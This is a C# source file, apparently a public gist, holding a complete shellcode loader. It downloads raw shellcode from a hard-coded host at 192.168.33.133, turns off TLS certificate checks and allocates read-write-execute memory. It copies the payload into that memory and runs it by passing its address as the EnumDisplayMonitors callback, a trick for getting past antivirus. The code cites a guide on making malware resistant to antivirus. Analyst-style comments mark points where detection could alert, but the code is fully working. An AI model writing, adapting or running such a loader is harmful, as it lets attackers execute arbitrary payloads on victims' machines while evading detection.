@zux0x3a
Created June 21, 2022 13:15
using System;
using System.Runtime.InteropServices;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.IO;
using System.Net;
namespace callback_function
{
/// <summary>
/// Console program that fetches a byte buffer over HTTP(S), copies it into memory
/// committed with PAGE_EXECUTE_READWRITE, and passes that address to
/// EnumDisplayMonitors as the enumeration callback pointer.
/// </summary>
/// <remarks>
/// Analyst view of the observable behaviours in this file: an outbound request with a
/// fixed User-Agent string, process-wide TLS certificate validation disabled, an
/// anonymous read/write/execute allocation sized to the downloaded buffer, and a
/// user32 enumeration API called with a callback address that is not backed by any
/// loaded module. Each of these is a separate point where telemetry can alert.
/// </remarks>
internal class Program
{
// Win32 allocation-type flag passed as flAllocationType to VirtualAlloc.
public const uint MEM_COMMIT = 0x00001000;
// Win32 page-protection value: the region is readable, writable and executable at once.
public const uint PAGE_EXECUTE_READWRITE = 0x40;
/// <summary>P/Invoke binding for kernel32 VirtualAlloc; returns the base address as an IntPtr.</summary>
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
/// <summary>
/// P/Invoke binding for user32 EnumDisplayMonitors. The callback parameter
/// (lpfnEnum) is declared as a raw IntPtr instead of a delegate type, so the
/// marshaller accepts any address without a managed method behind it.
/// </summary>
[DllImport("user32.dll")]
private static extern bool EnumDisplayMonitors(IntPtr hdc, IntPtr lprcClip, IntPtr lpfnEnum, uint dwData);
/// <summary>
/// Downloads the resource at <paramref name="shellcode_url"/> and returns its raw bytes.
/// </summary>
/// <param name="shellcode_url">URL handed unchanged to WebClient.DownloadData.</param>
/// <returns>The response body as a byte array.</returns>
/// <remarks>
/// Side effects: three static ServicePointManager properties are overwritten, which
/// affects every later request made through ServicePointManager in this process, not
/// only this download. No exception handling is present, so any failure raised by
/// DownloadData propagates to the caller. The WebClient is never disposed.
/// </remarks>
public static byte[] download_shellcode(string shellcode_url)
{
WebClient dwl = new WebClient();
// Fixed, truncated User-Agent value; it is sent on every request made by this client.
dwl.Headers.Add("User-Agent", "Mozilla/5.0 (windows)");
ServicePointManager.Expect100Continue = true;
// Plain assignment (not |=): TLS 1.2 becomes the only protocol enabled here.
ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
// The callback returns true unconditionally, so every server certificate is accepted
// (expired, self-signed, wrong host name). An HTTPS download through this method is
// therefore not authenticated and is open to interception.
ServicePointManager.ServerCertificateValidationCallback = delegate
{
return true;
};
byte[] chunk = dwl.DownloadData(shellcode_url);
return chunk;
}
/// <summary>
/// Writes the buffer to the console as comma-separated lowercase hex bytes.
/// </summary>
/// <param name="shellcodeBytes">Bytes to format; Length is read before any null check.</param>
/// <remarks>
/// Output shape is "&lt;length&gt;] { 0x.., 0x.. };" with no opening bracket or type name
/// in front of the length. NOTE(review): this looks like the tail of a C-style array
/// declaration with its prefix missing; confirm against the referenced article.
/// </remarks>
public static void printshellcode( byte[] shellcodeBytes)
{
// ref: https://blog.securityevaluators.com/creating-av-resistant-malware-part-3-fdacdf071a5f
StringBuilder shellcode = new StringBuilder();
shellcode.Append(shellcodeBytes.Length);
shellcode.Append("] { ");
for (int i = 0; i < shellcodeBytes.Length; i++)
{
shellcode.Append("0x");
shellcode.AppendFormat("{0:x2}", shellcodeBytes[i]);
// A separator is added after every byte except the last one.
if (i < shellcodeBytes.Length - 1)
{
shellcode.Append(",");
}
}
shellcode.Append("};");
Console.WriteLine(shellcode.ToString());
}
/// <summary>
/// Entry point: download, print, allocate, copy, then call EnumDisplayMonitors with
/// the copied buffer's address as lpfnEnum.
/// </summary>
/// <param name="args">Command-line arguments; not read.</param>
/// <remarks>
/// The URL is hard-coded and uses the http scheme with a private (RFC 1918) address,
/// so the TLS settings made in download_shellcode do not apply to this request and the
/// content travels unencrypted. Neither the VirtualAlloc result nor the
/// EnumDisplayMonitors result is checked.
/// </remarks>
static void Main(string[] args)
{
byte[] buf = download_shellcode("http://192.168.33.133/shellcode.bin"); // shellcode should be RAW format
printshellcode(buf); // debug output only; this call can be commented out
int payloadSize = buf.Length;
// Anonymous region that is writable and executable at the same time, sized to the download.
IntPtr addr = VirtualAlloc (IntPtr.Zero, (uint)payloadSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Copies the downloaded bytes from the managed array into the unmanaged region.
Marshal.Copy(buf, 0, addr, payloadSize);
// addr is passed as the callback pointer, so control reaches the copied bytes from
// inside user32 rather than through a thread-creation API.
EnumDisplayMonitors(IntPtr.Zero, IntPtr.Zero, addr, 0x00);
}
}
}